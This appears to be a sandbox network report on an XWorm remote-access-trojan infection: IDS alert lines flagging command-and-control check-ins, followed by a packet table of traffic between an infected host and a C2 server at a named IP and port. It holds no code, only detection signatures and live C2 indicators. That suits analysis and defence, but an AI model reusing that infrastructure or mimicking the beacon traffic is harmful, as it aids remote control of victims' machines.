2024-12-18T08:17:45.634389+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:17:57.260857+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:17:57.263162+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:17:58.430043+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:18:08.930832+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:18:08.932951+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:18:12.401150+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:18:12.403176+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:18:12.591925+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:18:12.594444+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:18:12.713869+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:18:12.715630+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:18:15.259849+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:18:15.262040+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:18:18.994275+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:18:18.999823+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:18:22.639364+0100 | 2858799 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:18:23.072270+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:18:23.074203+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:18:28.444810+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:18:34.833814+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:18:34.838093+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:18:36.479150+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:18:36.481824+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:18:37.871432+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:18:37.874173+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:18:45.510717+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:18:45.514127+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:18:57.135572+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:18:57.141141+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:18:58.456985+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:19:08.793859+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:19:08.800193+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:19:17.112172+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:19:17.253400+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:19:21.167141+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:19:21.168994+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
2024-12-18T08:19:28.446368+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:19:30.432749+0100 | 2852870 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes | 1 | 92.255.57.155 | 4411 | 192.168.2.9 | 49705 | TCP |
2024-12-18T08:19:30.433858+0100 | 2852923 | ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) | 1 | 192.168.2.9 | 49705 | 92.255.57.155 | 4411 | TCP |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Dec 18, 2024 08:15:32.074886084 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:15:32.194696903 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:15:32.194782019 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:15:32.320987940 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:15:32.440628052 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:15:43.947086096 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:15:44.066736937 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:15:44.383553028 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:15:44.423183918 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:15:44.542860985 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:15:55.560941935 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:15:55.680402040 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:15:55.993777990 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:15:55.995603085 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:15:56.115129948 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:15:58.442744017 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:15:58.498080969 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:16:07.186110020 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:16:07.305715084 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:16:07.619210005 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:16:07.622697115 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:16:07.742328882 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:16:18.811115026 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:16:18.930670977 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:16:19.244265079 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:16:19.246948004 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:16:19.366472006 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:16:28.596947908 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:16:28.638796091 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:16:30.435878992 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:16:30.556533098 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:16:30.869806051 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:16:30.871893883 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:16:30.991879940 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:16:35.108000040 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:16:35.227524996 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:16:35.342138052 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:16:35.461611032 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:16:35.467082024 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:16:35.540658951 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:16:35.586577892 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:16:35.586657047 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:16:35.706140041 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:16:35.775609016 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:16:35.777466059 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:16:35.897037029 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:16:35.966382027 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:16:35.971329927 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:16:36.091773033 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:16:36.842448950 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:16:36.962307930 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:16:37.275818110 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:16:37.278095007 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:16:37.398591042 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:16:46.592221975 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:16:46.711651087 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:16:47.024808884 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:16:47.027278900 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:16:47.146789074 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:16:51.248492002 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:16:51.367975950 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:16:51.368040085 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:16:51.487651110 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:16:51.681720972 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:16:51.687516928 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:16:51.807106018 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:16:51.872600079 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:16:51.874948978 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:16:51.994409084 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:16:55.342319012 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:16:55.462127924 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:16:55.860763073 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:16:55.863013029 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:16:55.982563019 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:16:58.870116949 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:16:58.920070887 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:17:01.797969103 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:17:01.917500973 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:17:02.360637903 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:17:02.363893986 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:17:02.483362913 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:17:06.905189991 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:17:07.024748087 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:17:07.061321020 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:17:07.180794001 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:17:07.310982943 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:17:07.338323116 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:17:07.420186043 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:17:07.430474043 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:17:07.430547953 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:17:07.529525995 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:17:07.550050020 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:17:07.550481081 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:17:07.669923067 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:17:07.798850060 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:17:07.804065943 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:17:07.923572063 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:17:18.936070919 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:17:19.055669069 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:17:19.369699001 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:17:19.371972084 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:17:19.491430044 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:17:28.217447996 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:17:28.337037086 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:17:28.636168957 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:17:28.732680082 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:17:28.826358080 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:17:28.828701019 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:17:28.948163986 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:17:29.577013969 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:17:29.696588993 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:17:29.696682930 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:17:29.816255093 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:17:29.816319942 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:17:29.935825109 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:17:29.936018944 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:17:30.009802103 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:17:30.055666924 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:17:30.055763960 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:17:30.175245047 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:17:30.200715065 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:17:30.202778101 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:17:30.364953041 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:17:30.366725922 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:17:30.371294975 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:17:30.392546892 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:17:30.435787916 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:17:30.491019964 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:17:30.491087914 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:17:30.513469934 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:17:30.625941992 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:17:30.654201031 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:17:30.654294014 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:17:30.683444977 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:17:30.733963013 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:17:30.774940968 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:17:30.778034925 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:17:30.897488117 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:17:37.654983044 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:17:37.774736881 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:17:38.088186026 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:17:38.091675997 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:17:38.211743116 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:17:41.092479944 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:17:41.213987112 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:17:41.526412964 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:17:41.528388977 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:17:41.648174047 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:17:45.186322927 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:17:45.305859089 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:17:45.623107910 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:17:45.634388924 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:17:45.753911018 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:17:56.811279058 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:17:56.930881023 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:17:57.260857105 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:17:57.263161898 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:17:57.382745028 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:17:58.430042982 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:17:58.486021042 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:18:08.498043060 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:18:08.617779970 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:18:08.930831909 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:18:08.932950974 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:18:09.054086924 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:18:11.967648029 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:18:12.087337017 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:18:12.092647076 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:18:12.212897062 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:18:12.212971926 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:18:12.332662106 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:18:12.401149988 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:18:12.403176069 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:18:12.522975922 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:18:12.591924906 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:18:12.594444036 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:18:12.713869095 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:18:12.713896990 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:18:12.715630054 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:18:12.835268974 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:18:14.826867104 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:18:14.946554899 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:18:15.259849072 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:18:15.262039900 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:18:15.381664991 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:18:18.561378002 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:18:18.681472063 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:18:18.994275093 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:18:18.999823093 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:18:19.119590044 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:18:22.639364004 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:18:22.758862972 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:18:23.072269917 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:18:23.074203014 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:18:23.193919897 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:18:28.444809914 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
Dec 18, 2024 08:18:28.498595953 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:18:34.264504910 CET | 49705 | 4411 | 192.168.2.9 | 92.255.57.155 |
Dec 18, 2024 08:18:34.384186983 CET | 4411 | 49705 | 92.255.57.155 | 192.168.2.9 |
